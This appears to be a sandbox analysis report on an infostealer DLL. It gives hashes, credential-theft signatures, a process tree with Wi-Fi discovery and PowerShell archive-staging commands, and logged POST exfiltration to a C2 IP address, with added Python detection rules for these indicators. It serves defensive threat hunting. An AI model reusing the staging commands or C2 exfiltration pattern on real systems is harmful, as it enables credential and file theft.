Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64
    arch:x86
    image:win10v2004-20241007-en
    locale:en-us
    os:windows10-2004-x64
    system
  • submitted
    19/12/2024, 02:55 UTC

General

  • Target

    532182c6dcf52d5ce0bc271e94b13e83019fd8d09afdc5e68d985a092b250203.dll

  • Size

    1.2MB

  • MD5

    6f25f0506bf49fe7f35686ed1f8fef4a

  • SHA1

    e5596d4c2b924bc93755558e447d1a04d19efdfe

  • SHA256

    532182c6dcf52d5ce0bc271e94b13e83019fd8d09afdc5e68d985a092b250203

  • SHA512

    5d93f84c6d80430ee853e7ef20cce4235effc1ba49f860c358c16eaad1c762e74b67dd9aa4c7e1996b38da07c2c601ebdcaf8dba9d4b594c19b92db589ec18ae

  • SSDEEP

    24576:Usd+7fzBMqZjh2sntUcCy8LfunZzW8IFHcDVh1QhHAO:U3BHjh2OZ80ZzHIF85L

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Searches files on disk for stored credentials (T1552.001).

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Spawns powershell.exe (T1059.001). In this run it is used only to build the staging archive with Compress-Archive, see Processes.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. This signature fires on netsh.exe activity in general; the only netsh command observed in this run is `netsh wlan show profiles`, which is Wi-Fi discovery, not the registration of a helper DLL under HKLM\SOFTWARE\Microsoft\NetSh for persistence (T1546.007). Treat the persistence label as low confidence unless a helper DLL is actually found in that key.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\532182c6dcf52d5ce0bc271e94b13e83019fd8d09afdc5e68d985a092b250203.dll,#1
    1⤵
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2456
    • C:\Windows\system32\netsh.exe
      netsh wlan show profiles
      2⤵
      • Event Triggered Execution: Netsh Helper DLL
      • System Network Configuration Discovery: Wi-Fi Discovery
      PID:1996
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\437139445115_Desktop.zip' -CompressionLevel Optimal
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2492
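
The process chain above is a compact hunting target: rundll32.exe loads a DLL from %TEMP% and calls its export by ordinal (`,#1` means "export number 1", so there is no descriptive export name to match on), then spawns `netsh wlan show profiles` (Wi-Fi profile discovery) and a PowerShell `Compress-Archive` that stages a ZIP in %TEMP%. The following is an added detection example, not code from the report or from the sample. The events are constructed to mirror the tree; the `ProcEvent` field names are a hypothetical schema, not any particular EDR or Sysmon layout.

```python
"""Hunting logic for the rundll32 -> netsh / powershell chain shown in the report.
Sample events are constructed to mirror the sandbox process tree; the event
schema (pid, ppid, image, cmdline) is hypothetical."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample telemetry modelled on the sandbox tree (PIDs copied from it),
# plus a benign explorer -> notepad pair as a control.
SAMPLE_EVENTS = [
    ProcEvent(2456, 1000, r"C:\Windows\system32\rundll32.exe",
              r"rundll32.exe C:\Users\Admin\AppData\Local\Temp\532182c6dcf52d5ce0bc271e94b13e83019fd8d09afdc5e68d985a092b250203.dll,#1"),
    ProcEvent(1996, 2456, r"C:\Windows\system32\netsh.exe", "netsh wlan show profiles"),
    ProcEvent(2492, 2456, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\437139445115_Desktop.zip' -CompressionLevel Optimal"),
    ProcEvent(3000, 1000, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(3001, 3000, r"C:\Windows\system32\notepad.exe", "notepad.exe"),
]

# Directories an unprivileged user can write to; a DLL loaded from here by rundll32 is suspicious.
USER_WRITABLE = re.compile(r"\\(AppData\\Local\\Temp|Users\\Public|ProgramData)\\", re.I)
# rundll32 ",#N" syntax: call the export at ordinal N rather than a named export.
ORDINAL_EXPORT = re.compile(r"\.dll\s*,\s*#\d+\b", re.I)


def image_name(path):
    """Lower-case basename of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (pid, reason) findings for the three behaviours in the chain."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = image_name(e.image)
        parent = by_pid.get(e.ppid)
        parent_name = image_name(parent.image) if parent else ""

        if (name == "rundll32.exe" and USER_WRITABLE.search(e.cmdline)
                and ORDINAL_EXPORT.search(e.cmdline)):
            findings.append((e.pid, "rundll32 loads DLL from user-writable path by ordinal export"))

        if (name == "netsh.exe" and parent_name == "rundll32.exe"
                and re.search(r"\bwlan\s+show\s+profiles?\b", e.cmdline, re.I)):
            findings.append((e.pid, "Wi-Fi profile discovery (T1016.002) spawned by rundll32"))

        if (name == "powershell.exe" and re.search(r"Compress-Archive", e.cmdline, re.I)
                and re.search(r"-DestinationPath\s+'[^']*\\Temp\\", e.cmdline, re.I)):
            findings.append((e.pid, "PowerShell stages archive in %TEMP% (T1560.001), parent "
                             + (parent_name or "unknown")))
    return findings


if __name__ == "__main__":
    for pid, reason in detect(SAMPLE_EVENTS):
        print(pid, reason)
```

The parent check on the netsh rule is what keeps it quiet on admin workstations, where `netsh wlan show profiles` is typed by hand from cmd.exe or PowerShell; the same command with rundll32.exe as its parent has no legitimate explanation.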

Network

  • RU
    POST
    http://185.215.113.209/Fru7Nk9/index.php
    rundll32.exe
    Remote address:
    185.215.113.209:80
    Request
    POST /Fru7Nk9/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 185.215.113.209
    Content-Length: 21
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Thu, 19 Dec 2024 02:56:03 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • RU
    POST
    http://185.215.113.209/Fru7Nk9/index.php?wal=1
    rundll32.exe
    Remote address:
    185.215.113.209:80
    Request
    POST /Fru7Nk9/index.php?wal=1 HTTP/1.1
    Content-Type: multipart/form-data; boundary=----NzI3NjA=
    Host: 185.215.113.209
    Content-Length: 72920
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Thu, 19 Dec 2024 02:56:06 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • US
    DNS
    209.113.215.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.113.215.185.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    209.113.215.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.113.215.185.in-addr.arpa
    IN PTR
  • US
    DNS
    217.106.137.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    217.106.137.52.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    217.106.137.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    217.106.137.52.in-addr.arpa
    IN PTR
  • US
    DNS
    86.49.80.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    86.49.80.91.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    68.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    68.159.190.20.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    133.211.185.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.211.185.52.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    154.239.44.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    154.239.44.20.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    197.87.175.4.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    197.87.175.4.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    206.23.85.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    206.23.85.13.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    97.188.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    97.188.18.2.in-addr.arpa
    IN PTR
    Response
    97.188.18.2.in-addr.arpa
    IN PTR
    a2-18-188-97.deploy.static.akamaitechnologies.com
  • US
    DNS
    19.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    19.229.111.52.in-addr.arpa
    IN PTR
    Response
  • US
    DNS
    13.173.189.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    13.173.189.20.in-addr.arpa
    IN PTR
    Response
  Per-destination summary (bytes and packet counts are from the sandbox VM's side: Sent = VM to remote, Recv = remote to VM). Only the HTTP connection is attributed to a process (rundll32.exe); the PTR lookups are not attributed to any process in the report.

  Remote              Domain / URL                                     Proto  Sent     Recv    Pkts tx  Pkts rx  Transactions
  185.215.113.209:80  http://185.215.113.209/Fru7Nk9/index.php?wal=1   http   112.3kB  18.2kB  931      374      POST /Fru7Nk9/index.php -> 200; POST /Fru7Nk9/index.php?wal=1 -> 200
  8.8.8.8:53          209.113.215.185.in-addr.arpa                     dns    148 B    134 B   2        1        2 x PTR request
  8.8.8.8:53          217.106.137.52.in-addr.arpa                      dns    146 B    147 B   2        1        2 x PTR request
  8.8.8.8:53          86.49.80.91.in-addr.arpa                         dns    70 B     145 B   1        1        1 x PTR request
  8.8.8.8:53          68.159.190.20.in-addr.arpa                       dns    72 B     158 B   1        1        1 x PTR request
  8.8.8.8:53          95.221.229.192.in-addr.arpa                      dns    73 B     144 B   1        1        1 x PTR request
  8.8.8.8:53          133.211.185.52.in-addr.arpa                      dns    73 B     147 B   1        1        1 x PTR request
  8.8.8.8:53          154.239.44.20.in-addr.arpa                       dns    72 B     158 B   1        1        1 x PTR request
  8.8.8.8:53          197.87.175.4.in-addr.arpa                        dns    71 B     157 B   1        1        1 x PTR request
  8.8.8.8:53          206.23.85.13.in-addr.arpa                        dns    71 B     145 B   1        1        1 x PTR request
  8.8.8.8:53          97.188.18.2.in-addr.arpa                         dns    70 B     133 B   1        1        1 x PTR request
  8.8.8.8:53          19.229.111.52.in-addr.arpa                       dns    72 B     158 B   1        1        1 x PTR request
  8.8.8.8:53          13.173.189.20.in-addr.arpa                       dns    72 B     158 B   1        1        1 x PTR request
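
The two POSTs to 185.215.113.209 are the only attributed traffic, and they carry the C2 pattern worth matching on: a short form-encoded check-in to /Fru7Nk9/index.php (21-byte body), then a 72,920-byte multipart upload to the same script with `?wal=1`. The multipart boundary `----NzI3NjA=` is base64 for the ASCII string `72760`, which is 160 bytes short of the Content-Length and matches the 71KB size of 437139445115_Desktop.zip, consistent with the staged archive being the uploaded body. The block below is an added example, not code from the report or the sample: it parses a raw request header block, decodes the boundary, and lists the reasons a request matches this pattern. The sample requests are reconstructed from the captured headers (the report shows no bodies); the benign request is invented as a control.

```python
"""Matcher for the C2 POSTs captured in the report. Sample requests are
reconstructed from the headers shown there; the bodies were not captured, so
only the header block is parsed. The BENIGN request is a constructed control."""
import base64
import binascii
import re

# Reconstructed from the report's captured headers.
BEACON = (
    "POST /Fru7Nk9/index.php HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: 185.215.113.209\r\n"
    "Content-Length: 21\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)
EXFIL = (
    "POST /Fru7Nk9/index.php?wal=1 HTTP/1.1\r\n"
    "Content-Type: multipart/form-data; boundary=----NzI3NjA=\r\n"
    "Host: 185.215.113.209\r\n"
    "Content-Length: 72920\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)
# Constructed control: an ordinary browser GET that must not match.
BENIGN = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n\r\n"
)

IPV4 = re.compile(r"^\d{1,3}(\.\d{1,3}){3}(:\d+)?$")


def parse_request(raw):
    """Split an HTTP/1.1 request head into method, target and a lower-cased header dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers}


def boundary_hint(req):
    """Decode the multipart boundary (minus leading dashes) as base64; None if absent/invalid."""
    ctype = req["headers"].get("content-type", "")
    m = re.search(r"boundary=-*([A-Za-z0-9+/=]+)", ctype)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None


def c2_reasons(req):
    """Return the list of indicators this request shares with the captured C2 traffic."""
    h = req["headers"]
    reasons = []
    if req["method"] == "POST" and IPV4.match(h.get("host", "")):
        reasons.append("POST to bare IPv4 host")
    if "user-agent" not in h:
        reasons.append("no User-Agent header")
    if re.search(r"/index\.php(\?wal=1)?$", req["target"]):
        reasons.append("C2 path index.php"
                       + (" with exfil flag wal=1" if "wal=1" in req["target"] else ""))
    hint = boundary_hint(req)
    if hint is not None and hint.isdigit():
        reasons.append("multipart boundary is base64 of a number (%s)" % hint)
    return reasons


if __name__ == "__main__":
    for name, raw in (("beacon", BEACON), ("exfil", EXFIL), ("benign", BENIGN)):
        print(name, c2_reasons(parse_request(raw)))
```

The numeric boundary is the most specific of these indicators; a bare-IP POST without a User-Agent is common enough across commodity stealers that it should raise a hunt, not a block, on its own.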

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\437139445115_Desktop.zip

    Filesize

    71KB

    MD5

    36c67ec0a9ad650b8e0c0f80d11177ec

    SHA1

    ca5714d78c62f1a7b3fc3fe99da49e64847484cb

    SHA256

    3b648cee93734e0f7be0d3858a3109bf275d7fe52543a6409b4ae9fa0e46ff66

    SHA512

    d824af534f1f07a274e37c573d8f83594b6b9d69e80950534afa1312b28ebc65a960c0405ba5ede8c5a9513cefb231b609d71aba40ec241af577d2907c6e2309

  • C:\Users\Admin\AppData\Local\Temp\_Files_\AssertInvoke.docx

    Filesize

    18KB

    MD5

    fd80231e47eda2148753be7caa821bbb

    SHA1

    00dbadaab2b4788c32e2e5bb251039ec172448bf

    SHA256

    1cf25b42ebf7dd7d2149ed0a637ab4ca3dec4fd7d7dccd045aa1c97f0591eaa6

    SHA512

    ad0a197a0cdeb37afa72ebb87d425680829e9af821b9ecda031d8b52c6d4e4863f3dd8e2056d83c334ddab12630a96d3d290eb7857181021883b936647f90581

  • C:\Users\Admin\AppData\Local\Temp\_Files_\DismountRead.xlsx

    Filesize

    10KB

    MD5

    742392c03406698ec77c9a16936e5363

    SHA1

    ebfa964cf89848d40ef21549d4bfed7efa5b43dd

    SHA256

    3acd2168b8a851b1fdd4f6640090f2a3fdeed8ffaffe3256c035d19fcf5819f7

    SHA512

    d49032fab0efbc0b5a76e748089e9f12e103e33db1d8cb4bc91c8ee352d7f4207c1ad6b141fa46ecf6ebab68320f86c1a6bee41658ff9d0b6c70d184176e1529

  • C:\Users\Admin\AppData\Local\Temp\_Files_\ImportHide.docx

    Filesize

    15KB

    MD5

    5d38fc77abbf3ed291d97db068ebae95

    SHA1

    781e99affd9f8f0746c9de34825dacebfd0a966a

    SHA256

    e3b6ecc2514e24ce2dd68feebaeb00a9d3e3d4c24779b72c132e8c530702d8db

    SHA512

    31cf38f8960f62d2bf49a25b15b737df581a620ab60f5582099e6a3b67b9264555d7fdbb36fdaf9fb750be8d9b5915d435506bf382e294ca78032075c9103591

  • C:\Users\Admin\AppData\Local\Temp\_Files_\ImportSearch.xlsx

    Filesize

    13KB

    MD5

    f476fd07a8a977060f93964e2104cc11

    SHA1

    7a8edcbe65de4318996cedb66f22159d6611ff37

    SHA256

    4ae0e7db0ba08de070125ad265195c6d8795cb057e061e16af77d49e1f495b5d

    SHA512

    2e8df89e01842385ce779a571a9d4079275bf6465a97ac5d5e1bfb825b6e7d71e52c60e240796627faffc31fa2d5d1da375b398afdd37e75ebbba3eefd83cdbd

  • C:\Users\Admin\AppData\Local\Temp\_Files_\LockExpand.docx

    Filesize

    16KB

    MD5

    bee930a7354714601938a8932dbc6f27

    SHA1

    0a8157b32e68997aa6f88cbf48ff1217bf84d20e

    SHA256

    f9efc6828b9461ead81834076de8948a3399c7bc398babd315c03ecca03c31f6

    SHA512

    487f9afd9a06d153d81c00812b685b07a233a7417653c59eff46f4dec3b124134b08c20fc14ac86e4ad494f9769326373d15df1611b86462fb82266ea4da8bf1

  • C:\Users\Admin\AppData\Local\Temp\_Files_\UndoRevoke.xlsx

    Filesize

    11KB

    MD5

    ca82c42fa0861e48a8d4d7a3b08d892f

    SHA1

    f6a6c4bdee8b01a2fb4980424068457f0e54d3be

    SHA256

    bb84e6b82e7d9f3c4117e9bb138f35150b3dfa5432be4935b294f6546f05f2bb

    SHA512

    a93b968dc39158627edda3480df049dab38b9c3d92253dc2ddaa01cead873ddd1b38b66dc371a7ee27ec5c5d6233e35fde38cb0b48131314b822e3753f2d241f

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tqaewkoa.m1i.ps1
    (written by powershell.exe itself at start-up to probe whether an AppLocker/WDAC script policy is enforced; a side effect of the PowerShell launch, not a file dropped by the sample)

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2492-17-0x00007FFBAD000000-0x00007FFBADAC1000-memory.dmp

    Filesize

    10.8MB

  • memory/2492-20-0x000002574CCD0000-0x000002574CCDA000-memory.dmp

    Filesize

    40KB

  • memory/2492-19-0x000002574D070000-0x000002574D082000-memory.dmp

    Filesize

    72KB

  • memory/2492-18-0x00007FFBAD000000-0x00007FFBADAC1000-memory.dmp

    Filesize

    10.8MB

  • memory/2492-6-0x00007FFBAD003000-0x00007FFBAD005000-memory.dmp

    Filesize

    8KB

  • memory/2492-30-0x00007FFBAD000000-0x00007FFBADAC1000-memory.dmp

    Filesize

    10.8MB

  • memory/2492-7-0x000002574CCE0000-0x000002574CD02000-memory.dmp

    Filesize

    136KB
